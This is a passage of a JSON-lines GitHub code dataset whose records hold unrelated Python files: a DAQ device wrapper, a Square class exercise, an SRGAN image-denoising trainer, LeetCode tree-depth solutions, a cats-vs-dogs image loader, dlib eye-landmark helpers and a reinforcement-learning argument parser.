Best Time to Buy and Sell Stock II.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32213561076","text":"\"\"\"\r\nCreated on Feb 16 2018\r\n\r\n@author: MCC\r\n\"\"\"\r\nfrom ctypes import c_double, c_uint, byref, Array, c_longlong\r\nfrom .daqo_info import DaqoInfo\r\nfrom .ul_c_interface import lib\r\nfrom .ul_exception import ULException\r\nfrom .ul_enums import ScanStatus, WaitType, TriggerType, ScanOption, DaqOutScanFlag\r\nfrom .ul_structs import DaqOutChanDescriptor, TransferStatus\r\n\r\n\r\ndef _daqo_chan_descriptor_array(size, descriptor_list):\r\n chan_descriptor_array = DaqOutChanDescriptor * size # type: type\r\n return chan_descriptor_array(*descriptor_list)\r\n\r\n\r\nclass DaqoDevice:\r\n \"\"\"\r\n An instance of the DaqoDevice class is obtained by calling\r\n :func:`DaqDevice.get_daqo_device`.\r\n \"\"\"\r\n\r\n def __init__(self, handle):\r\n self.__handle = handle\r\n self.__daqo_info = DaqoInfo(handle)\r\n\r\n def get_info(self):\r\n # type: () -> DaqoInfo\r\n \"\"\"\r\n Gets the DAQ output information object for the device\r\n referenced by the :class:`DaqoDevice` object.\r\n\r\n Returns:\r\n DaqoInfo:\r\n\r\n A DaqoInfo object used for retrieving information about the\r\n DAQ output subsystem of the UL DAQ Device.\r\n \"\"\"\r\n return self.__daqo_info\r\n\r\n def daq_out_scan(self, channel_descriptors, samples_per_channel, rate,\r\n options, flags, data):\r\n # type: (list[DaqOutChanDescriptor], int, float, ScanOption, DaqOutScanFlag, Array[float]) -> float\r\n \"\"\"\r\n Outputs values synchronously to multiple output subsystems, such as\r\n analog and digital subsystems, on the device referenced by the\r\n :class:`DaqoDevice` object. This method only works with devices that\r\n support synchronous output.\r\n\r\n Args:\r\n channel_descriptors (list[DaqOutChanDescriptor]): A list of\r\n DaqOutChanDescriptor objects.\r\n samples_per_channel (int): The number of samples per channel to\r\n output.\r\n rate (float): The sample rate in scans per second.\r\n options (ScanOption): One or more attributes (suitable for bit-wise\r\n operations) specifying the optional conditions that will be\r\n applied to the scan, such as continuous or external clock.\r\n flags (DaqOutScanFlag): One or more attributes (suitable for\r\n bit-wise operations) specifying the conditioning applied to the\r\n data.\r\n data (Array[float]): The data buffer to be written. 
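The buffer must contain\r\n                samples_per_channel values for each channel in channel_descriptors.\r\n                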
Use\r\n :class:`create_float_buffer` to create the buffer.\r\n\r\n Returns:\r\n float:\r\n\r\n The actual output scan rate.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n sample_rate = c_double(rate)\r\n number_of_channels = len(channel_descriptors)\r\n chan_descriptor_array = _daqo_chan_descriptor_array(number_of_channels,\r\n channel_descriptors)\r\n err = lib.ulDaqOutScan(self.__handle, chan_descriptor_array,\r\n number_of_channels, samples_per_channel,\r\n byref(sample_rate), options, flags, data)\r\n if err != 0:\r\n raise ULException(err)\r\n\r\n return sample_rate.value\r\n\r\n def get_scan_status(self):\r\n # type: () -> tuple[ScanStatus, TransferStatus]\r\n \"\"\"\r\n Gets the current status, count, and index of the synchronous output scan\r\n operation on the device referenced by the :class:`DaqoDevice` object.\r\n\r\n Returns:\r\n ScanStatus, TransferStatus:\r\n\r\n A tuple containing the scan status and transfer status for the\r\n daq input background operation.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n scan_status = c_uint()\r\n transfer_status = TransferStatus()\r\n err = lib.ulDaqOutScanStatus(self.__handle, byref(scan_status),\r\n byref(transfer_status))\r\n if err != 0:\r\n raise ULException(err)\r\n\r\n return ScanStatus(scan_status.value), transfer_status\r\n\r\n def scan_stop(self):\r\n # type: () -> None\r\n \"\"\"\r\n Stops the synchronous output scan operation currently running\r\n on the device referenced by the :class:`DaqoDevice` object.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n err = lib.ulDaqOutScanStop(self.__handle)\r\n if err != 0:\r\n raise ULException(err)\r\n\r\n def scan_wait(self, wait_type, timeout):\r\n # type: (WaitType, float) -> None\r\n \"\"\"\r\n Waits until the scan operation completes on the device referenced by\r\n the :class:`DaqoDevice` object, or the specified timeout elapses.\r\n\r\n Args:\r\n wait_type (WaitType): The wait type.\r\n timeout (float): The timeout value in seconds (s); set to -1 to\r\n wait indefinitely for the scan function to end.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n wait_param = c_longlong(0)\r\n err = lib.ulDaqOutScanWait(self.__handle, wait_type, wait_param,\r\n timeout)\r\n if err != 0:\r\n raise ULException(err)\r\n\r\n def set_trigger(self, trigger_type, trigger_channel, level, variance,\r\n retrigger_sample_count):\r\n # type: (TriggerType, DaqOutChanDescriptor, float, float, int) -> None\r\n \"\"\"\r\n Configures the trigger parameters for the device referenced by the\r\n :class:`DaqoDevice` object that will be used when :func:`daq_out_scan`\r\n is called with the :class:`~ScanOption.RETRIGGER` or\r\n :class:`~ScanOption.EXTTRIGGER` ScanOption.\r\n\r\n Args:\r\n trigger_type (TriggerType): One of the :class:`TriggerType`\r\n attributes that determines the type of the external trigger.\r\n trigger_channel (DaqOutChanDescriptor): The trigger channel.\r\n level (float): The level at or around which the trigger event should\r\n be detected; ignored if trig_type is set to\r\n :class:`~TriggerType.POS_EDGE` :class:`~TriggerType.NEG_EDGE`,\r\n :class:`~TriggerType.HIGH`, :class:`~TriggerType.LOW`,\r\n :class:`~TriggerType.GATE_HIGH`, :class:`~TriggerType.GATE_LOW`,\r\n :class:`~TriggerType.RISING`, or :class:`~TriggerType.FALLING`.\r\n variance (float): The degree to which the input signal can vary\r\n relative to the level parameter; ignored for all types where\r\n level is ignored. 
For pattern triggering, this argument serves\r\n                as the mask value.\r\n            retrigger_sample_count (int): The number of samples per trigger to\r\n                acquire with each trigger event; ignored unless\r\n                :class:`ScanOption.RETRIGGER` is set for the scan.\r\n\r\n        Raises:\r\n            :class:`ULException`\r\n        \"\"\"\r\n        trig_level = c_double(level)\r\n        trig_variance = c_double(variance)\r\n\r\n        err = lib.ulDaqOutSetTrigger(self.__handle, trigger_type,\r\n                                     trigger_channel, trig_level, trig_variance,\r\n                                     retrigger_sample_count)\r\n        if err != 0:\r\n            raise ULException(err)\r\n","repo_name":"hunterschone/ProControl","sub_path":"task_presentation/fMRI/move_see_design/uldaq/daqo_device.py","file_name":"daqo_device.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74313124969","text":"#!/usr/bin/python3\n\"\"\"a module that defines a class Square\"\"\"\n\n\nclass Square:\n    \"\"\"a class that defines a square based on 1-square.py\n    private instance attribute size\n    without any module\"\"\"\n    def __init__(self, size=0, position=(0, 0)):\n        \"\"\"size must be an integer, otherwise raise a TypeError\n        exception with the message size must be an integer\n        if size is less than 0, raise a ValueError exception\n        with the message size must be >= 0\n        \"\"\"\n        self._Square__size = size\n        self._Square__position = position\n        if type(size) is not int:\n            raise TypeError(\"size must be an integer\")\n        elif (size < 0):\n            raise ValueError(\"size must be >= 0\")\n        elif (not(isinstance(position, tuple)) or len(position) != 2):\n            raise TypeError(\"position must be a tuple of 2 positive integers\")\n        elif (type(position[0]) is not int or type(position[1]) is not int):\n            raise TypeError(\"position must be a tuple of 2 positive integers\")\n        elif (position[0] < 0 or position[1] < 0):\n            raise TypeError(\"position must be a tuple of 2 positive integers\")\n\n    @property\n    def size(self):\n        \"\"\"getter to get the value of size\"\"\"\n        return self._Square__size\n\n    @size.setter\n    def size(self, value):\n        \"\"\"setter to change the value of size into value\"\"\"\n        if type(value) is not int:\n            raise TypeError(\"size must be an integer\")\n        if (value < 0):\n            raise ValueError(\"size must be >= 0\")\n        self._Square__size = value\n\n    @property\n    def position(self):\n        \"\"\"getter to get the value of position\"\"\"\n        return self._Square__position\n\n    @position.setter\n    def position(self, value):\n        \"\"\"setter to set the value position\"\"\"\n        if (not isinstance(value, tuple) or len(value) != 2 or\n                type(value[0]) is not int or type(value[1]) is not int or\n                value[0] < 0 or value[1] < 0):\n            raise TypeError(\"position must be a tuple of 2 positive integers\")\n        self._Square__position = value\n\n    def area(self):\n        \"\"\"function to calculate the area of the square\"\"\"\n        return (self._Square__size * self._Square__size)\n\n    def my_print(self):\n        \"\"\"function that prints in stdout the square with the character #\"\"\"\n        if self._Square__size == 0:\n            print(\"\")\n        else:\n            for x in range(self._Square__size):\n                for y in range(self._Square__size):\n                    for a in range(self._Square__position[0]):\n                        if y != 0:\n                            break\n                        print(\"_\", end=\"\")\n                    print(\"#\", end=\"\")\n                print(\"\\n\", end=\"\")\n","repo_name":"IyasuH/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74157867048","text":"# Based on: 
https://medium.com/analytics-vidhya/implementing-srresnet-srgan-super-resolution-with-tensorflow-89900d2ec9b2\n# Paper: https://arxiv.org/pdf/1609.04802.pdf (SRGAN)\n# Pytorch Impl: https://github.com/Lornatang/SRGAN-PyTorch/blob/main/model.py\n\nimport os\nimport tensorflow as tf\nimport keras\nimport model_builder\nimport metrics\nimport RESNET\nimport train\nimport shutil\nimport pathlib\nimport basics \n\n# === SRGAN ===\ndef _get_spatial_ndim(x):\n return keras.backend.ndim(x) - 2\n\ndef _get_num_channels(x):\n return keras.backend.int_shape(x)[-1]\n\ndef _conv(x, num_filters, kernel_size, padding='same', **kwargs):\n n = _get_spatial_ndim(x)\n if n not in (2, 3):\n raise NotImplementedError(f'{n}D convolution is not supported')\n\n return (keras.layers.Conv2D if n == 2 else\n keras.layers.Conv3D)(\n num_filters, kernel_size, padding=padding, **kwargs)(x)\n\ndef _residual_blocks(x, repeat):\n num_channels = _get_num_channels(x)\n\n for _ in range(repeat):\n short_skip = x\n x = _conv(x,num_channels,3)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.PReLU()(x)\n x = _conv(x,num_channels,3)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Add()([x, short_skip])\n return x\n\ndef _residual_disc_blocks(x):\n num_channels = _get_num_channels(x)\n channels = [num_channels * n for n in range(1,5)]\n print(channels)\n\n x = _conv(x,num_channels,3,strides = 2)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.LeakyReLU()(x)\n \n for i in range(len(channels)):\n x = _conv(x,channels[i],3,strides = 1)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.LeakyReLU()(x)\n x = _conv(x,channels[i],3,strides = 2)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.LeakyReLU()(x)\n return x\n\n# Build a discriminator model\ndef build_discriminator_model(input_shape = (50,256,256,1),\n *,\n num_channels,\n num_residual_blocks,\n num_channel_out =1):\n print('=== Building Discriminator Model --------------------------------------------')\n inputs = keras.layers.Input(input_shape)\n x = _conv(inputs, num_channels, 3)\n x = keras.layers.LeakyReLU()(x)\n \n \n x = _residual_disc_blocks(x)\n x = keras.layers.Flatten()(x)\n x = keras.layers.Dense(1024)(x)\n x = keras.layers.LeakyReLU()(x)\n outputs = keras.layers.Dense(1,activation='sigmoid')(x)\n\n model = keras.Model(inputs,outputs,name='Discriminator')\n print('--------------------------------------------------------------------')\n\n return model\n\ndef build_and_compile_srgan(config):\n learning_rate = config['initial_learning_rate']\n generator = RESNET.build_generator_model((*config['input_shape'], 1),\n num_channels=config['num_channels'],\n num_residual_blocks=config['num_residual_blocks'],\n num_channel_out = 1)\n \n generator = model_builder.compile_model(generator, learning_rate, config['loss'], config['metrics'],0,\n config['ssim_FSize'],config['ssim_FSig'])\n \n discriminator = build_discriminator_model((*config['input_shape'], 1),\n num_channels=config['num_channels'],\n num_residual_blocks=config['num_residual_blocks'],\n num_channel_out =1)\n discriminator.summary()\n\n return generator, discriminator\n\ndef SRGAN_fit_model(model_name, strategy, config, initial_path, output_dir,training_data, validation_data):\n generator, discriminator, care = model_builder.build_and_compile_model(model_name, strategy, config)\n Gen_flag, CARE_flag = basics.SRGAN_Weight_search(pathlib.Path(output_dir))\n if Gen_flag == 1:\n Gen_final_weights_path = str(pathlib.Path(output_dir) / 'Pretrained.hdf5')\n 
else: \n generator, Gen_final_weights_path = generator_train(generator, model_name, config, output_dir, training_data, validation_data)\n generator.load_weights(Gen_final_weights_path)\n if CARE_flag == 1:\n CARE_final_weights_path = str(pathlib.Path(output_dir) / 'CARE_Pretrained.hdf5')\n else: \n if os.path.exists((initial_path + '/Denoising2PImages/' + 'CARE_Pretrained.hdf5')):\n CARE_final_weights_path = (initial_path + '/Denoising2PImages/' + 'CARE_Pretrained.hdf5')\n print(f'CARE Pretrained weights found in GitLab Repository path :{CARE_final_weights_path}')\n else:\n raise Exception('CARE Model needs to be pretrained, please confirm you have weights for standard CARE model')\n care.load_weights(CARE_final_weights_path)\n\n srgan_checkpoint_dir = str(pathlib.Path(output_dir) / 'ckpt' / 'srgan')\n print(f'Checkpoints saved in {srgan_checkpoint_dir}')\n os.makedirs(srgan_checkpoint_dir, exist_ok=True)\n with strategy.scope(): \n learning_rate=tf.keras.optimizers.schedules.PiecewiseConstantDecay(boundaries=[100000], values=[1e-4, 1e-5])\n generator_optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n discriminator_optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate) \n\n srgan_checkpoint = tf.train.Checkpoint(psnr=tf.Variable(0.0),\n ssim=tf.Variable(0.0), \n generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n generator=generator,\n discriminator=discriminator)\n\n srgan_checkpoint_manager = tf.train.CheckpointManager(checkpoint=srgan_checkpoint,\n directory=srgan_checkpoint_dir,\n max_to_keep=3)\n \n if srgan_checkpoint_manager.latest_checkpoint:\n srgan_checkpoint.restore(srgan_checkpoint_manager.latest_checkpoint)\n perceptual_loss_metric = tf.keras.metrics.Mean()\n discriminator_loss_metric = tf.keras.metrics.Mean()\n psnr_metric = tf.keras.metrics.Mean()\n ssim_metric = tf.keras.metrics.Mean()\n best_val_ssim = None\n for i in range(config['epochs']):\n for _, batch in enumerate(training_data):\n perceptual_loss, discriminator_loss = strategy.run(train_step, args=(batch,srgan_checkpoint,care))\n perceptual_loss_metric(perceptual_loss)\n discriminator_loss_metric(discriminator_loss)\n lr = batch[0]\n hr = batch[1]\n sr = srgan_checkpoint.generator.predict(lr)\n psnr_value = metrics.psnr(hr, sr)\n hr = tf.cast(hr,tf.double)\n sr = tf.cast(sr,tf.double)\n ssim_value = metrics.ssim(hr, sr)\n psnr_metric(psnr_value)\n ssim_metric(ssim_value)\n CARE_loss = perceptual_loss_metric.result()\n dis_loss = discriminator_loss_metric.result()\n psnr_train = psnr_metric.result()\n ssim_train = ssim_metric.result()\n print(f'Training --> Epoch # {i}: CARE_loss = {CARE_loss:.4f}, Discrim_loss = {dis_loss:.4f}, PSNR = {psnr_train:.4f}, SSIM = {ssim_train:.4f}')\n perceptual_loss_metric.reset_states()\n discriminator_loss_metric.reset_states()\n psnr_metric.reset_states()\n ssim_metric.reset_states()\n\n srgan_checkpoint.psnr.assign(psnr_train)\n srgan_checkpoint.ssim.assign(ssim_train)\n\n\n for _, val_batch in enumerate(validation_data):\n lr = val_batch[0]\n hr = val_batch[1]\n sr = srgan_checkpoint.generator.predict(lr)\n hr_output = srgan_checkpoint.discriminator.predict(hr)\n sr_output = srgan_checkpoint.discriminator.predict(sr)\n\n con_loss = metrics.calculate_content_loss(hr, sr, care)\n gen_loss = metrics.calculate_generator_loss(sr_output)/len(sr_output)\n perc_loss = con_loss + 0.001 * gen_loss\n disc_loss = metrics.calculate_discriminator_loss(hr_output, sr_output)/len(sr_output)\n\n perceptual_loss_metric(perc_loss)\n 
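# accumulate running means of the perceptual and discriminator losses over the validation set\n            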
discriminator_loss_metric(disc_loss)\n\n psnr_value = metrics.psnr(hr, sr)\n hr = tf.cast(hr,tf.double)\n sr = tf.cast(sr,tf.double)\n ssim_value = metrics.ssim(hr, sr)\n psnr_metric(psnr_value)\n ssim_metric(ssim_value)\n CARE_loss = perceptual_loss_metric.result()\n dis_loss = discriminator_loss_metric.result()\n total_ssim = ssim_metric.result()\n psnr_train = psnr_metric.result()\n ssim_train = ssim_metric.result()\n if best_val_ssim == None or total_ssim > best_val_ssim:\n print('New Checkpoint Saved')\n srgan_checkpoint_manager.save()\n best_val_ssim = total_ssim\n print(f'Validation --> Epoch # {i}: CARE_loss = {CARE_loss:.4f}, Discrim_loss = {dis_loss:.4f}, PSNR = {psnr_train:.4f}, SSIM = {ssim_train:.4f}')\n perceptual_loss_metric.reset_states()\n discriminator_loss_metric.reset_states()\n psnr_metric.reset_states()\n ssim_metric.reset_states()\n return srgan_checkpoint, srgan_checkpoint_manager\nlearning_rate=tf.keras.optimizers.schedules.PiecewiseConstantDecay(boundaries=[100000], values=[1e-4, 1e-5])\ngenerator_optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\ndiscriminator_optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate) \n\n@tf.function\ndef train_step(images,srgan_checkpoint,CARE):\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n lr = images[0]\n hr = images[1]\n sr = srgan_checkpoint.generator(lr, training=True)\n hr_output = srgan_checkpoint.discriminator(hr, training=True)\n sr_output = srgan_checkpoint.discriminator(sr, training=True)\n\n con_loss = metrics.calculate_content_loss(hr, sr, CARE)\n gen_loss = metrics.calculate_generator_loss(sr_output)/len(sr_output)\n perc_loss = con_loss + 0.001 * gen_loss\n disc_loss = metrics.calculate_discriminator_loss(hr_output, sr_output)/len(sr_output)\n\n gradients_of_generator = gen_tape.gradient(perc_loss, srgan_checkpoint.generator.trainable_variables)\n gradients_of_discriminator = disc_tape.gradient(disc_loss, srgan_checkpoint.discriminator.trainable_variables)\n\n generator_optimizer.apply_gradients(zip(gradients_of_generator, srgan_checkpoint.generator.trainable_variables))\n discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, srgan_checkpoint.discriminator.trainable_variables))\n\n return perc_loss, disc_loss\n\ndef generator_train(generator, model_name, config, output_dir, training_data, validation_data):\n generator = train.fit_model(generator, model_name, config, output_dir,training_data, validation_data)\n os.chdir(pathlib.Path(output_dir))\n model_paths = [model_path for model_path in os.listdir() if model_path.endswith(\".hdf5\") ]\n assert len(model_paths) != 0, f'No models found under {output_dir}'\n latest = max(model_paths, key=os.path.getmtime)\n final_weights_path = str(pathlib.Path(output_dir) / 'Pretrained.hdf5')\n source = str(pathlib.Path(output_dir) / latest)\n print(f'Location of source file: \"{source}\"')\n print(f'Location of Final Weights file: \"{final_weights_path}\"')\n shutil.copy(source, final_weights_path)\n print(f'Pretrained Weights are saved to: \"{final_weights_path}\"')\n\n return generator, final_weights_path","repo_name":"Tufts-University/Denoising2PImages","sub_path":"srgan.py","file_name":"srgan.py","file_ext":"py","file_size_in_byte":11700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13300891886","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass 
Solution:\n def maxDepth(self, root: TreeNode) -> int:\n if(root is None):\n return 0\n if(root.left is None and root.right is None):\n return 1\n \n left = self.maxDepth(root.left)\n right = self.maxDepth(root.right)\n\n return max(left,right)+1\n\n# another approach \n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxDepth(self, root: Optional[TreeNode]) -> int:\n # # (1) recursive\n # def find_max(node):\n # if not node: return 0\n # left = 1 + find_max(node.left)\n # right = 1 + find_max(node.right)\n\n # return max(left,right)\n # return find_max(root)\n\n #(2) iterative\n if not root: return 0\n\n stack = [(root,1)]\n res = 0\n\n while stack:\n node, depth = stack.pop()\n if node:\n res = max(res,depth)\n stack.append((node.left,depth + 1))\n stack.append((node.right,depth + 1))\n return res\n\n\n","repo_name":"oumburs9/Competitive-Programming","sub_path":"Leet Code Problems/Easy problems/#104 Maximum Depth of Binary Tree - Easy.py","file_name":"#104 Maximum Depth of Binary Tree - Easy.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21453875745","text":"import unittest\nfrom solution import Solution\n\nclass Test(unittest.TestCase):\n\n def setUp(self) -> None:\n self.s = Solution()\n\n def test1(self):\n piles = [3,6,7,11]\n h = 8\n self.assertEqual(self.s.minEatingSpeed(piles, 8), 4)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"jerrt2003/leetcode-in-python","sub_path":"875_Koko_Eating_Bananas/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23705317036","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport cv2\r\nimport random\r\n\r\nDATADIR = r\"C:\\Users\\Fleford Redoloza\\PycharmProjects\\TensorFlowPractice\\kagglecatsanddogs_3367a\\PetImages\"\r\n\r\nCATEGORIES = [\"Dog\", \"Cat\"]\r\n\r\nimg_size = 100\r\n\r\n# for category in CATEGORIES: # do dogs and cats\r\n# path = os.path.join(DATADIR, category) # create path to dogs and cats\r\n# for img in os.listdir(path): # iterate over each image per dogs and cats\r\n# img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE) # convert to array\r\n# plt.imshow(img_array, cmap='gray') # graph it\r\n# plt.show() # display!\r\n#\r\n# img_size = 100\r\n#\r\n# new_array = cv2.resize(img_array, (img_size, img_size))\r\n# plt.imshow(new_array, cmap='gray')\r\n# plt.show()\r\n#\r\n# break # we just want one for now so break\r\n#\r\n# break # ...and one more!\r\n\r\n\r\ntraining_data = []\r\n\r\n\r\ndef create_training_data():\r\n for category in CATEGORIES: # do dogs and cats\r\n path = os.path.join(DATADIR, category) # create path to dogs and cats\r\n class_num = CATEGORIES.index(category)\r\n for img in os.listdir(path): # iterate over each image per dogs and cats\r\n try:\r\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE) # convert to array\r\n new_array = cv2.resize(img_array, (img_size, img_size)) # resize image array\r\n training_data.append([new_array, class_num])\r\n except Exception as e:\r\n pass\r\n\r\ncreate_training_data()\r\nrandom.shuffle(training_data)\r\nprint(len(training_data))\r\n\r\nfor sample in training_data[:10]:\r\n print(sample[1])\r\n\r\nX = []\r\nY = 
[]\r\n\r\nfor features, label in training_data:\r\n X.append(features)\r\n Y.append(label)\r\n","repo_name":"Fleford/TensorFlowPractice","sub_path":"DogCatCNN.py","file_name":"DogCatCNN.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38649028240","text":"import numpy as np\nimport cv2\nimport argparse\nimport dlib\n\nFACIAL_LANDMARKS_IDs ={\n\t\"mouth\":(48, 68),\n\t\"right_eyebrow\": (17, 22),\n\t\"left_eyebrow\": (22, 27),\n\t\"right_eye\":(36, 42),\n\t\"left_eye\": (42, 48),\n\t\"nose\": (27, 35)}\n\nRIGHT_EYE_IDs = FACIAL_LANDMARKS_IDs[\"right_eye\"]\nLEFT_EYE_IDs = FACIAL_LANDMARKS_IDs[\"left_eye\"]\n\n# initialize dlib face detector (HOG-based) and then create the facial landmark predictor\ndef predict_face_rectangle(image):\n\tdetector = dlib.get_frontal_face_detector()\n\tgray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\tface_rectangle = detector(gray_image, 1)\n\treturn face_rectangle\n\n\n#Rectangle to bounding box\n#convert a box, which was predicted by dlib to the format (x,y,width,height)\n\n\ndef rectangle_to_box(box):\n\n\tx = box[0][0]\n\ty = box[0][1]\n\twidth = box[1][0]-x\n\theight = box[1][1]-y\n\treturn (x,y,width,height)\n\n\ndef shape_to_np(shape):\n\t#list of x,y coordinates\n\txy = np.zeros((68,2),dtype=\"int\")\n\t#loop over the 68 facial landmarks and convert them to a tuple x,y coordinates\n\tfor i in range (0,68):\n\t\txy[i]=(shape.part(i).x,shape.part(i).y)\n\treturn xy\n\n#downscaling an image with preserved height to width ratio.\n#resizing an image means changing the dimension of it. cv2 image It returns a tuple of number of rows, columns and channels (if image is color).If image is grayscale, tuple returned contains only number of rows and columns. 
So it is a good method to check if loaded image is grayscale or color image.\ndef downscale(img,scale_percent):\n\twidth=int(img.shape[1]*scale_percent/100)\n\theight=int(img.shape[0]*scale_percent/100)\n\tdim=(width,height)\n\tresized=cv2.resize(img,dim,interpolation = cv2.INTER_AREA)\n\treturn resized\n\n\ndef upscale(img,factor):\n\twidth = int(img.shape[1]*factor)\n\theight = int(img.shape[0]*factor)\n\tdim = (width, height)\n\tresized = cv2.resize(img, dim, interpolation=cv2.INTER_AREA)\n\treturn resized\n\n\ndef predict_face_shape(image, face_rectangle, shape_predictor):\n\t#load the shape predictor model\n\tpredictor=dlib.shape_predictor(shape_predictor)\n\tgray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\t#for each face detected\n\tfor (i, rect) in enumerate(face_rectangle):\n\t\t#determine face landmarks in gray image\n\t\tshape = predictor(gray_image,rect)\n\t\t#convert to numpy array\n\t\tshape=[(int(s.x), int(s.y)) for s in shape.parts()]\n\treturn shape\n\n\ndef extract_face (image, face_rectangle):\n\n\t(x,y,w,h) = rectangle_to_box(face_rectangle)\n\tface = image[y:y+h, x:x+w]\n\treturn face\n\n\ndef extract_eye(eyeID, shape, image):\n\tif shape is None:\n\t\treturn None\n\t(i,j)=eyeID\n\tmagic = 5\n\n\t(x, y, w, h) = cv2.boundingRect(np.array([shape[i:j]]))\n\n\treturn x-magic, y-magic, cv2.medianBlur(image[y-5: y+5+h, x-5: x+5+w], 5) # image[y-magic: y+5+magic, x-magic: x+magic+w] # cv2.bilateralFilter(image[y-magic: y+5+magic, x-magic: x+magic+w], 5, 20, 20) #\n\ndef circle_detection(img, dp, minDist, par1=100, par2=100, minr=0, maxr=0):\n\n\t# detect circles in the image\n\tcircles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, dp=dp, minDist=minDist, param1=par1, param2=par2, minRadius=minr, maxRadius=maxr)\n\n\t# ensure at least some circles were found\n\tif circles is not None:\n\t\t# convert the (x, y) coordinates and radius of the circles to integers\n\t\tcircles = np.round(circles[0, :]).astype(\"int\")\n\t\tcircle_xyrs = []\n\t\t# loop over the (x, y) coordinates and radius of the circles\n\t\tfor (x, y, r) in circles:\n\t\t\t# draw the circle in the output image, then draw a rectangle\n\t\t\t# corresponding to the center of the circle\n\t\t\tcv2.circle(img, (x, y), r, (255, 255, 255), 1)\n\t\t\tcv2.circle(img, (x, y), 1, (255, 255, 255), 1)\n\n\t\t\tcircle_xyrs.append([x, y])\n\n\t\treturn img, circle_xyrs\n\n\telse:\n\t\treturn img, None\n\n\n\n\ndef detect_circle(img,par1=100,par2=20,minr=10,maxr=30):\n\n\tgray_image = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\tcircles = cv2.HoughCircles(gray_image, cv2.HOUGH_GRADIENT, 1, 20, param1=par1,param2=par2,minRadius=minr,maxRadius=maxr)\n\tcircles = np.uint16(np.around(circles))\n\n\n\treturn circles\n\n\ndef draw_circle(img, circles):\n\tfor i in circles[0,:]:\n\t\t# draw the outer circle\n\t\tcv2.circle(img,(i[0],i[1]),i[2],(0,255,0),2)\n\t\t# draw the center of the circle\n\t\tcv2.circle(img,(i[0],i[1]),2,(0,0,255),3)\n\n###################################################################\n#Visualization\t\n\ndef draw_face_rectangle (image, face_rectangle):\n\tfor (i,rect) in enumerate(face_rectangle):\n\t\t(x,y,w,h)=rectangle_to_box(rect)\n\t\t# Arguments : (source image, vertex of the rectangle, opposite vertex, color, optional : type of the line(how fat is the line, default is also ok))\n\t\tcv2.rectangle(image, (x,y),(x+w,y+h),(0, 255, 0),2)\n\ndef point_face_features (image, shape):\n\tfor (x,y) in shape:\n\t\t#(source image, center of the circle, radius, color)\n\t\tcv2.circle(image, (x,y), 1, 
(0,0,255))\n\ndef show_pic (descr, image):\n\tcv2.imshow(descr, image)\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n\n\n","repo_name":"stelviopas/EyeTracking","sub_path":"face_features_recognition.py","file_name":"face_features_recognition.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12571495802","text":"# import required packages\nimport argparse\nimport flare.polgrad as pg\nimport flare.qpolgrad as qpg\nimport flare.kindling as fk\nimport numpy as np\nimport pybullet_envs\nfrom typing import Optional, Union, Tuple, List\n\n# set up argparser.\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-a\", \"--alg\", type=str, help=\"Algorithm to use\", default=\"PPO\")\nparser.add_argument(\n \"-e\", \"--env\", type=str, help=\"Env to train in\", default=\"LunarLander-v2\"\n)\nparser.add_argument(\n \"-ep\", \"--epochs\", type=int, help=\"Number of epochs to train for\", default=100\n)\nparser.add_argument(\n \"-hor\", \"--horizon\", type=int, help=\"Horizon length of each episode\", default=1000\n)\nparser.add_argument(\n \"-g\",\n \"--gamma\",\n type=float,\n help=\"Discount factor for GAE-lambda advantage calculation\",\n default=0.99,\n)\nparser.add_argument(\n \"-lam\",\n \"--lam\",\n type=float,\n help=\"Lambda for GAE-lambda advantage calculation\",\n default=0.97,\n)\nparser.add_argument(\n \"-l\",\n \"--layers\",\n 